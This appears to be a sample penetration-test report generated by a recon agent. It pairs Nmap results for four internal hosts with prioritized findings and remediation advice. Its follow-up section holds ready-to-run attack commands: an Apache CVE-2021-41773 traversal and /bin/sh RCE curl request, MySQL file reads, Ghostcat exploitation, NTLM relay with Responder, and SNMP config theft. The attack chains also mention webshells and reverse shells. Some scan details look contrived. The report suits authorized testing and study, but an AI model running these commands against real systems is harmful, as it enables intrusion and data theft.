Skip to content

Latest commit

 

History

History
538 lines (416 loc) · 21.7 KB

File metadata and controls

538 lines (416 loc) · 21.7 KB

Sample Output: Generated by the recon-advisor agent. This demonstrates automated analysis of Nmap scan results with prioritized findings, CVE mappings, and actionable follow-up recommendations.

Nmap Scan Analysis Report

Raw Scan Output

The following Nmap scan was executed against the 10.10.1.0/24 subnet (Server VLAN) during an internal penetration test.

Scan Command:

nmap -sS -sV -O -A --script=default,vuln -T4 -p- 10.10.1.50-53 -oA server_vlan_scan

Raw Results

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 09:23 EDT
Nmap scan report for web01.corp.acme.local (10.10.1.50)
Host is up (0.0012s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: ACME Internal Portal
| http-methods:
|_  Potentially risky methods: PUT DELETE
| http-enum:
|   /admin/: Admin portal
|   /phpmyadmin/: phpMyAdmin
|   /.git/HEAD: Git repository found
|   /server-status: Apache server-status (accessible)
443/tcp  open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| ssl-cert: Subject: commonName=web01.corp.acme.local
| Not valid after:  2024-03-15T00:00:00
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
8080/tcp open  http     Apache Tomcat 9.0.30
|_http-title: Apache Tomcat/9.0.30
|_http-favicon: Apache Tomcat
| http-methods:
|_  Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
MAC Address: 00:50:56:B9:1A:2F (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

Nmap scan report for dc-file01.corp.acme.local (10.10.1.51)
Host is up (0.00085s latency).
Not shown: 65528 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-15 13:23:45Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server 2019 Standard 17763 microsoft-ds
|_smb-os-discovery: Windows Server 2019 Standard 17763
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: CORP
|   NetBIOS_Domain_Name: CORP
|   NetBIOS_Computer_Name: DC-FILE01
|   DNS_Domain_Name: corp.acme.local
|   DNS_Computer_Name: dc-file01.corp.acme.local
|   Product_Version: 10.0.17763
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
MAC Address: 00:50:56:B9:3C:7E (VMware)
Device type: general purpose
Running: Microsoft Windows 2019
OS CPE: cpe:/o:microsoft:windows_server_2019
OS details: Microsoft Windows Server 2019 Build 17763
Network Distance: 1 hop

Host script results:
| smb2-time:
|   date: 2024-09-15T13:23:52
|_  start_date: N/A
|_clock-skew: mean: 0s, deviation: 0s, median: 0s

Nmap scan report for db01.corp.acme.local (10.10.1.52)
Host is up (0.0011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a5:b7:4c:92:d1:f4:6e:8c:5a:1f:3b:7d:9e:2a:c4:8f (RSA)
|   256 d8:3e:7a:1b:c5:9f:2d:4a:6b:8c:e1:f7:3a:5d:9e:2b (ECDSA)
|_  256 f1:2a:8b:c4:d7:9e:3f:5a:6b:1c:e8:7d:4f:9a:2e:3b (ED25519)
| ssh-auth-methods:
|   Supported authentication methods:
|     publickey
|_    password
3306/tcp open  mysql   MySQL 5.7.29-0ubuntu0.18.04.1
| mysql-info:
|   Protocol: 10
|   Version: 5.7.29-0ubuntu0.18.04.1
|   Thread ID: 847
|   Capabilities flags: 65535
|   Some Coverage flags: 15
|   Status: Autocommit
|   Salt: 5]K\x0Eg7@m#}i%\x17s!Q&N\x03a
|_  Auth Plugin Name: mysql_native_password
| mysql-enum:
|   Valid usernames:
|     root:<empty> - Valid credentials
|_  Statistics: Performed 10 guesses in 1 seconds, average tps: 10.0
| mysql-databases:
|   information_schema
|   acme_production
|   acme_hr
|   wordpress
|_  mysql
MAC Address: 00:50:56:B9:5D:A1 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop

Nmap scan report for mgmt-sw01.corp.acme.local (10.10.1.53)
Host is up (0.0009s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      Cisco SSH 2.0 (protocol 2.0)
| ssh-hostkey:
|   2048 c3:8a:f2:1d:b5:e7:9c:4a:6f:d8:2b:7e:a1:3c:5d:9f (RSA)
161/tcp  open  snmp     SNMPv2c
| snmp-info:
|   enterprise: ciscoSystems
|   engineIDFormat: mac
|   engineIDData: 00:50:56:b9:7f:c2
|   snmpEngineBoots: 47
|_  snmpEngineTime: 182d 07:42:19
| snmp-brute:
|   public - Valid credentials
|_  private - Valid credentials
| snmp-sysdescr: Cisco IOS Software, Catalyst 3850 Software (CAT3K_CAA-UNIVERSALK9-M), Version 16.3.5b, RELEASE SOFTWARE
|_  System uptime: 182 days, 7:42:19.00
443/tcp  open  ssl/http Cisco IOS HTTPS management
|_http-title: Cisco Switch Management
| ssl-cert: Subject: commonName=mgmt-sw01.corp.acme.local
|_  Not valid after:  2023-06-01T00:00:00
8443/tcp open  ssl/http Cisco Prime Infrastructure
|_http-title: Cisco Prime Infrastructure
| http-auth:
|   HTTP/1.1 401 Unauthorized
|_  Basic realm="Cisco Prime Infrastructure"
MAC Address: 00:50:56:B9:7F:C2 (VMware)
Device type: network device
Running: Cisco IOS 16.X
OS CPE: cpe:/o:cisco:ios:16
OS details: Cisco IOS 16.3.5b
Network Distance: 1 hop

Nmap done: 4 IP addresses (4 hosts up) scanned in 287.34 seconds

Agent Analysis

Prioritized Finding Summary

Priority Host Finding Severity CVEs Immediate Action
P1 10.10.1.52 MySQL root with empty password CRITICAL N/A (misconfiguration) Restrict access, set password immediately
P2 10.10.1.50 Apache 2.4.29: path traversal / RCE CRITICAL CVE-2021-41773, CVE-2021-42013 Patch to 2.4.58+, verify mod_cgi status
P3 10.10.1.50 Apache Tomcat 9.0.30: Ghostcat AJP HIGH CVE-2020-1938 Check for AJP connector on 8009, upgrade Tomcat
P4 10.10.1.51 SMB signing disabled HIGH N/A (misconfiguration) Enable and require SMB signing via GPO
P5 10.10.1.50 Exposed .git directory HIGH N/A (misconfiguration) Block access, rotate any leaked credentials
P6 10.10.1.53 SNMP default community strings (public/private) HIGH N/A (misconfiguration) Change community strings, restrict SNMP ACLs
P7 10.10.1.50 Expired SSL certificate MEDIUM N/A Renew certificate
P8 10.10.1.53 Expired management SSL certificate MEDIUM N/A Renew certificate
P9 10.10.1.50 phpMyAdmin exposed MEDIUM N/A (misconfiguration) Restrict access to management IPs only
P10 10.10.1.50 Apache server-status accessible LOW N/A (misconfiguration) Restrict to localhost

Detailed Host Analysis

Host 1: 10.10.1.50 (web01.corp.acme.local), Web Server

OS: Linux 4.15-5.8 (Ubuntu) Role: Internal web portal and application server Risk Level: CRITICAL

Finding 1.1: Apache HTTP Server 2.4.29, Multiple Critical CVEs

Apache 2.4.29 is significantly outdated (released October 2017) and is affected by numerous known vulnerabilities:

CVE Severity Description CVSS
CVE-2021-41773 Critical Path traversal and remote code execution via crafted URI 9.8
CVE-2021-42013 Critical Bypass for CVE-2021-41773 fix, RCE via path traversal 9.8
CVE-2021-44790 Critical Buffer overflow in mod_lua multipart parser 9.8
CVE-2022-22720 High HTTP request smuggling 9.8
CVE-2022-31813 High mod_proxy X-Forwarded-For header bypass 9.8
CVE-2019-0211 High Local privilege escalation via scoreboard manipulation 7.8

Exploitation Path: CVE-2021-41773 allows reading arbitrary files and (if mod_cgi is enabled) executing system commands without authentication. This is a well-known, trivially exploitable vulnerability with public proof-of-concept code.

Finding 1.2: Apache Tomcat 9.0.30, Ghostcat (CVE-2020-1938)

Tomcat 9.0.30 is vulnerable to CVE-2020-1938 (Ghostcat), a critical vulnerability in the Apache JServ Protocol (AJP) connector. If the AJP connector is listening on port 8009 (default), an attacker can:

  • Read arbitrary files from the Tomcat webapp directories (including WEB-INF/web.xml containing credentials)
  • Achieve remote code execution if file upload is possible
CVE Severity CVSS Exploit Available
CVE-2020-1938 Critical 9.8 Yes, multiple public exploits
CVE-2020-9484 High 7.0 Yes, deserialization via session persistence
CVE-2020-11996 High 7.5 Yes, HTTP/2 DoS

Finding 1.3: Exposed .git Directory

The /.git/HEAD path is accessible, indicating the entire Git repository may be downloadable. This commonly exposes:

  • Source code of the application
  • Hardcoded credentials and API keys in commit history
  • Internal infrastructure details
  • Database connection strings

Finding 1.4: phpMyAdmin Exposed

phpMyAdmin is accessible at /phpmyadmin/. Combined with the MySQL root empty-password finding on 10.10.1.52, this could provide direct database administration access if the web server can reach the database server.

Finding 1.5: Risky HTTP Methods Enabled

PUT and DELETE methods are enabled on both ports 80 and 8080. PUT can potentially allow file upload leading to webshell deployment.


Host 2: 10.10.1.51 (dc-file01.corp.acme.local), Windows File Server

OS: Windows Server 2019 Build 17763 Role: File server with Kerberos services (possible secondary DC or domain-joined server with SPN registrations) Risk Level: HIGH

Finding 2.1: SMB Signing Disabled

SMB message signing is disabled on this host. This is a critical misconfiguration that enables:

  • NTLM relay attacks: An attacker who intercepts NTLM authentication (via LLMNR/NBT-NS poisoning, mitm6, or PetitPotam) can relay the authentication to this server to execute commands, access shares, or create machine accounts.
  • Man-in-the-middle attacks: Traffic between clients and this file server can be tampered with.

This is one of the most commonly exploited misconfigurations in Active Directory environments and frequently leads to domain compromise in real-world engagements.

Finding 2.2: Guest Account SMB Access

The scan indicates SMB authentication via the guest account is possible. This may allow unauthenticated share enumeration and potentially file access.

Finding 2.3: WinRM Enabled (5985/5986)

WinRM is listening on both HTTP (5985) and HTTPS (5986). If credentials or hashes are obtained, this provides a convenient lateral movement vector using tools like Evil-WinRM.

Finding 2.4: RDP Exposed (3389)

RDP is open, which expands the attack surface. Verify NLA is enforced and check for BlueKeep (CVE-2019-0708) if any older OS builds are present.


Host 3: 10.10.1.52 (db01.corp.acme.local), Database Server

OS: Linux 4.15-5.8 (Ubuntu 18.04) Role: MySQL database server Risk Level: CRITICAL

Finding 3.1: MySQL Root with Empty Password

This is the highest-priority finding in this scan. The MySQL root account has no password and is accessible from the network. This provides:

  • Complete database access: Full read/write to all databases including acme_production, acme_hr, and wordpress
  • Potential file system access: MySQL LOAD_FILE() and INTO OUTFILE functions can read and write files on the server
  • Potential command execution: If the MySQL server is running with elevated privileges, UDF (User Defined Functions) can be loaded for OS command execution
  • Credential harvesting: The wordpress database likely contains password hashes; acme_hr likely contains PII

Finding 3.2: MySQL 5.7.29, Known Vulnerabilities

MySQL 5.7.29 has reached end of support and contains known vulnerabilities:

CVE Severity Description
CVE-2020-14812 Medium Server: Locking unspecified vulnerability
CVE-2020-14769 Medium Server: Optimizer unspecified vulnerability
CVE-2020-14765 Medium Server: FTS unspecified vulnerability
CVE-2021-2307 Medium Server: Packaging privilege escalation

While these CVEs are lower severity, the empty root password makes them largely academic since full access is already available.

Finding 3.3: OpenSSH 7.6p1, Outdated

OpenSSH 7.6p1 is outdated. While no critical RCE vulnerabilities exist for this specific version, it lacks security improvements in newer releases and may be vulnerable to username enumeration (CVE-2018-15473).


Host 4: 10.10.1.53 (mgmt-sw01.corp.acme.local), Network Switch

OS: Cisco IOS 16.3.5b (Catalyst 3850) Role: Network management switch Risk Level: HIGH

Finding 4.1: SNMP Default Community Strings

Both public (read-only) and private (read-write) community strings are active. With private community string access, an attacker can:

  • Modify switch configuration: Change VLAN assignments, ACLs, routing
  • Extract full running configuration: Including all credentials, SNMP strings, enable secrets
  • Disable security controls: Remove ACLs, disable port security, modify spanning tree
  • Create persistence: Add rogue SNMP users, modify TACACS/RADIUS configuration

The public community string alone enables extraction of:

  • Complete interface inventory and status
  • ARP tables (IP-to-MAC mappings for entire VLAN)
  • Routing tables
  • CDP/LLDP neighbor information (network topology mapping)

Finding 4.2: Cisco IOS 16.3.5b, Outdated

IOS 16.3.5b is several major versions behind current releases. Notable vulnerabilities include:

CVE Severity Description
CVE-2020-3516 Medium Web UI DoS
CVE-2021-1385 Medium Cisco IOx path traversal
CVE-2023-20198 Critical IOS XE web UI privilege escalation (check if XE)

Finding 4.3: Expired SSL Certificate on Management Interface

The SSL certificate for the management HTTPS interface expired on 2023-06-01. This indicates the device may not be regularly maintained and suggests weak lifecycle management.

Finding 4.4: Cisco Prime Infrastructure (Port 8443)

Cisco Prime Infrastructure is running on port 8443 with basic HTTP authentication. Older versions of Cisco Prime have critical vulnerabilities including CVE-2019-15958 (RCE) and CVE-2018-15379 (arbitrary file upload). Version identification should be performed.


Follow-Up Commands

Immediate Priority (P1: MySQL Root Access)

# Verify MySQL root access and enumerate databases
mysql -h 10.10.1.52 -u root -e "SHOW DATABASES; SELECT user,host,authentication_string FROM mysql.user;"

# Check for file read/write privileges
mysql -h 10.10.1.52 -u root -e "SELECT @@secure_file_priv; SELECT LOAD_FILE('/etc/passwd');"

# Enumerate sensitive data
mysql -h 10.10.1.52 -u root -e "SELECT TABLE_SCHEMA, TABLE_NAME, TABLE_ROWS FROM information_schema.TABLES WHERE TABLE_SCHEMA NOT IN ('information_schema','mysql','performance_schema','sys');"

# Check for UDF command execution potential
mysql -h 10.10.1.52 -u root -e "SELECT @@plugin_dir; SHOW VARIABLES LIKE 'have_symlink';"

P2: Apache Path Traversal (CVE-2021-41773)

# Test for path traversal (read /etc/passwd)
curl -s --path-as-is "http://10.10.1.50/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"

# Test for RCE via mod_cgi (if enabled)
curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; id' "http://10.10.1.50/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh"

# Check mod_cgi/mod_cgid status
curl -s "http://10.10.1.50/server-status" | grep -i "cgi"

P3: Ghostcat (CVE-2020-1938)

# Check if AJP connector is listening on 8009
nmap -sS -p 8009 10.10.1.50

# If port 8009 is open, exploit Ghostcat to read WEB-INF/web.xml
python3 ajpShooter.py http://10.10.1.50 8009 /WEB-INF/web.xml read

# Alternative: use the PYFUSCATION tool
python3 ghostcat.py 10.10.1.50 -p 8009 -f /WEB-INF/web.xml

P4: SMB Signing Disabled (Relay Attack)

# Confirm SMB signing status across subnet
crackmapexec smb 10.10.1.0/24 --gen-relay-list relay_targets.txt

# Set up NTLM relay targeting 10.10.1.51
ntlmrelayx.py -tf relay_targets.txt -smb2support -socks

# In a separate terminal, start Responder to capture/relay hashes
responder -I eth0 -dwPv

P5: Exposed Git Repository

# Download the full .git directory
git-dumper http://10.10.1.50/.git/ ./git_dump

# Search for credentials in commit history
cd git_dump && git log --all -p | grep -iE "(password|secret|api_key|token|credential)" | head -50

# List all files ever committed
git log --all --diff-filter=A --summary | grep "create mode"

P6: SNMP Default Community Strings

# Full SNMP walk with public community string
snmpwalk -v2c -c public 10.10.1.53 1.3.6.1 > snmp_full_walk.txt

# Extract running configuration via private community string
snmpget -v2c -c private 10.10.1.53 1.3.6.1.4.1.9.9.96.1.1.1.1.0

# Use Metasploit to extract config
msfconsole -q -x "use auxiliary/scanner/snmp/cisco_config_tftp; set RHOSTS 10.10.1.53; set COMMUNITY private; run"

# Enumerate ARP table (map the network)
snmpwalk -v2c -c public 10.10.1.53 1.3.6.1.2.1.4.22.1.2

# Enumerate CDP neighbors (topology mapping)
snmpwalk -v2c -c public 10.10.1.53 1.3.6.1.4.1.9.9.23.1.2.1

P9: phpMyAdmin + MySQL Access Chain

# Check phpMyAdmin version
curl -s http://10.10.1.50/phpmyadmin/ | grep -oP 'phpMyAdmin \K[0-9.]+'

# If phpMyAdmin connects to 10.10.1.52, verify root access through the web interface
curl -s -c cookies.txt -b cookies.txt "http://10.10.1.50/phpmyadmin/index.php" \
  -d "pma_username=root&pma_password=&server=1"

Attack Path Recommendations

Path 1: MySQL to Full Server Compromise (Highest Probability)

MySQL root (no password) on 10.10.1.52
  --> Read /etc/shadow via LOAD_FILE()
  --> OR write webshell via INTO OUTFILE (if web root writable)
  --> OR load UDF for OS command execution
  --> Establish reverse shell as mysql user
  --> Local privilege escalation (Linux 4.15 kernel exploits / sudo misconfig)
  --> Pivot to other hosts

Path 2: Web Server Chain to Internal Network

Apache 2.4.29 path traversal (CVE-2021-41773) on 10.10.1.50
  --> Read sensitive files (/etc/passwd, application configs, database credentials)
  --> If mod_cgi enabled: direct RCE
  --> OR: Ghostcat (CVE-2020-1938) on Tomcat for web.xml credentials
  --> OR: .git dump for source code and embedded credentials
  --> Access phpMyAdmin with harvested credentials
  --> Pivot to database server

Path 3: NTLM Relay to Windows Admin Access

LLMNR/NBT-NS poisoning (broadcast traffic capture)
  --> Relay NTLM authentication to 10.10.1.51 (SMB signing disabled)
  --> Execute commands via SMB on file server
  --> Dump SAM database / cached credentials
  --> Access file shares for sensitive documents
  --> Lateral movement to other Windows hosts

Path 4: Network Infrastructure Compromise

SNMP private community string on 10.10.1.53
  --> Download full switch running configuration
  --> Extract enable secret, TACACS credentials
  --> Modify VLAN ACLs to access restricted segments
  --> Modify spanning tree / routing for traffic interception
  --> Pivot to Management VLAN devices

Recommended Primary Attack Chain

The recommended attack chain combines the highest-impact findings for maximum demonstrated risk:

1. MySQL root empty password (10.10.1.52) -- immediate database access
2. Extract credentials from acme_production and wordpress databases
3. Test credential reuse against domain accounts
4. Use Apache path traversal (10.10.1.50) -- file read for additional credentials
5. Dump .git repository for application secrets
6. NTLM relay via SMB signing disabled (10.10.1.51) -- Windows lateral movement
7. SNMP config extraction (10.10.1.53) -- network infrastructure access
8. Combine all access for full attack narrative in report

MITRE ATT&CK Mapping

Technique ID Technique Name Applicable Finding
T1190 Exploit Public-Facing Application Apache CVE-2021-41773, Tomcat CVE-2020-1938
T1046 Network Service Scanning Initial Nmap scan, service enumeration
T1110.001 Brute Force: Password Guessing MySQL empty root password
T1078.001 Valid Accounts: Default Accounts MySQL root, SNMP public/private
T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay SMB signing disabled on 10.10.1.51
T1213 Data from Information Repositories Database access, file share access
T1552.001 Unsecured Credentials: Credentials in Files .git repository, server-status, phpMyAdmin
T1602.001 Data from Configuration Repository: SNMP SNMP default community strings
T1021.004 Remote Services: SSH SSH access to 10.10.1.52, 10.10.1.53
T1021.001 Remote Services: RDP RDP open on 10.10.1.51
T1021.006 Remote Services: WinRM WinRM open on 10.10.1.51
T1059 Command and Scripting Interpreter Post-exploitation command execution
T1005 Data from Local System File system access via path traversal

Analysis generated from Nmap scan data. All findings require manual verification before exploitation. Follow rules of engagement and obtain explicit authorization before executing any exploitation commands.